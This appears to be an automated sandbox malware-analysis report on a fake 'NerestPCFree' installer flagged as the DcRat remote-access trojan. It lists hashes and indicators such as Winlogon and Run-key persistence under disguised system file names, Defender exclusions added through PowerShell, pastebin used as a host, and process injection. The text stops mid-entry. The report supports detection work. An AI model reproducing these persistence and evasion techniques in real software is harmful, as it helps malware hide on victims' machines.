Analysis
-
max time kernel
40s -
max time network
88s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-12-2024 16:58
Static task
static1
Behavioral task
behavioral1
Sample
NerestPC free/NerestPCFree 0.31.1.exe
Resource
win10v2004-20241007-en
General
-
Target
NerestPC free/NerestPCFree 0.31.1.exe
-
Size
7.0MB
-
MD5
9d0a77bd28d67eab798c50f0c6a24b64
-
SHA1
2de59eddd73ab784cc8f791cd96d7f81741ccae3
-
SHA256
a35479bc985fe56167b824f5d0d9ff96598af672afe8785bc9f87815c11393dc
-
SHA512
25ca283707b61c8149615f7e7958edb886378702ecbcf079191698d686b4a7a39d1be655e44ccf2752e569481e9eb25f3a10e59322c0c97c7e858fb5f9eabb17
-
SSDEEP
196608:i46iIYMaKuKGfjtVlQqtolrkiBJk3b8pA2uW3c:i7YpBDtVlmlgyJ0r
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\Cookies\\unsecapp.exe\", \"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\", \"C:\\Program Files\\Java\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\services.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\Cookies\\unsecapp.exe\", \"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\", \"C:\\Program Files\\Java\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\RuntimeBroker.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\Cookies\\unsecapp.exe\", \"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\", \"C:\\Program Files\\Java\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\RuntimeBroker.exe\", \"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\Cookies\\unsecapp.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\Cookies\\unsecapp.exe\", \"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\Cookies\\unsecapp.exe\", \"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\", \"C:\\Program Files\\Java\\Registry.exe\"" MsServerHost.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3380 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3660 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2884 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1340 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 940 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3732 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4852 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2864 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4856 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4876 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 740 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1996 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1164 3460 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2856 3460 schtasks.exe 105 -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 4052 created 3364 4052 twain32.exe 56 PID 4052 created 3364 4052 twain32.exe 56 PID 4052 created 3364 4052 twain32.exe 56 PID 4052 created 3364 4052 twain32.exe 56 PID 4052 created 3364 4052 twain32.exe 56 PID 4052 created 3364 4052 twain32.exe 56 PID 3552 created 3364 3552 updater.exe 56 PID 3552 created 3364 3552 updater.exe 56 PID 3552 created 3364 3552 updater.exe 56 PID 3552 created 3364 3552 updater.exe 56 PID 3552 created 3364 3552 updater.exe 56 PID 3552 created 3364 3552 updater.exe 56 PID 3552 created 3364 3552 updater.exe 56 -
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1124 powershell.exe 1876 powershell.exe 1992 powershell.exe 4036 powershell.exe 4756 powershell.exe 4208 powershell.exe 4664 powershell.exe 4476 powershell.exe 3284 powershell.exe 4988 powershell.exe 3992 powershell.exe 1360 powershell.exe 4420 powershell.exe 4072 powershell.exe 660 powershell.exe 224 powershell.exe 2496 powershell.exe 3076 powershell.exe 3828 powershell.exe 2964 powershell.exe 4284 powershell.exe 2880 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation NerestPCFree 0.31.1.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation MpDefenderCoreService.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation MsServerHost.exe -
Executes dropped EXE 4 IoCs
pid Process 2660 MpDefenderCoreService.exe 4052 twain32.exe 3552 updater.exe 1660 MsServerHost.exe -
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\Default\\Cookies\\unsecapp.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\Default\\Cookies\\unsecapp.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\WindowsRE\\services.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\WindowsRE\\services.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Java\\Registry.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Java\\Registry.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Downloaded Program Files\\RuntimeBroker.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Downloaded Program Files\\RuntimeBroker.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 pastebin.com 17 pastebin.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1704 powercfg.exe 2264 powercfg.exe 3252 cmd.exe 3032 powercfg.exe 1088 powercfg.exe 2756 cmd.exe 816 powercfg.exe 1532 powercfg.exe 4424 powercfg.exe 4960 powercfg.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\System32\Tasks\WmiPrvSE svchost.exe File opened for modification C:\Windows\System32\Tasks\RuntimeBroker svchost.exe File created \??\c:\Windows\System32\CSC32FC33ECE203443ABA9072655949BF63.TMP csc.exe File created \??\c:\Windows\System32\kpkopw.exe csc.exe File opened for modification C:\Windows\System32\Tasks\WmiPrvSEW svchost.exe File opened for modification C:\Windows\System32\Tasks\RegistryR svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHost svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\services svchost.exe File opened for modification C:\Windows\System32\Tasks\unsecappu svchost.exe File opened for modification C:\Windows\System32\Tasks\unsecapp svchost.exe File opened for modification C:\Windows\System32\Tasks\Registry svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHostM svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\servicess svchost.exe File opened for modification C:\Windows\System32\Tasks\RuntimeBrokerR svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4052 set thread context of 1228 4052 twain32.exe 98 PID 3552 set thread context of 2728 3552 updater.exe 121 PID 3552 set thread context of 244 3552 updater.exe 128 PID 3552 set thread context of 2140 3552 updater.exe 129 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe twain32.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Java\Registry.exe MsServerHost.exe File created C:\Program Files\Java\ee2ad38f3d4382 MsServerHost.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\Containers\serviced\WmiPrvSE.exe MsServerHost.exe File created C:\Windows\Containers\serviced\24dbde2999530e MsServerHost.exe File created C:\Windows\Downloaded Program Files\RuntimeBroker.exe MsServerHost.exe File opened for modification C:\Windows\Downloaded Program Files\RuntimeBroker.exe MsServerHost.exe File created C:\Windows\Downloaded Program Files\9e8d7a4ca61bd9 MsServerHost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3408 sc.exe 3708 sc.exe 1516 sc.exe 1996 sc.exe 1452 sc.exe 3452 sc.exe 4388 sc.exe 212 sc.exe 4760 sc.exe 3436 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NerestPCFree 0.31.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 624 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Request Saturday, December 14, 2024 16:59:30 = "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" svchost.exe Set value (str) 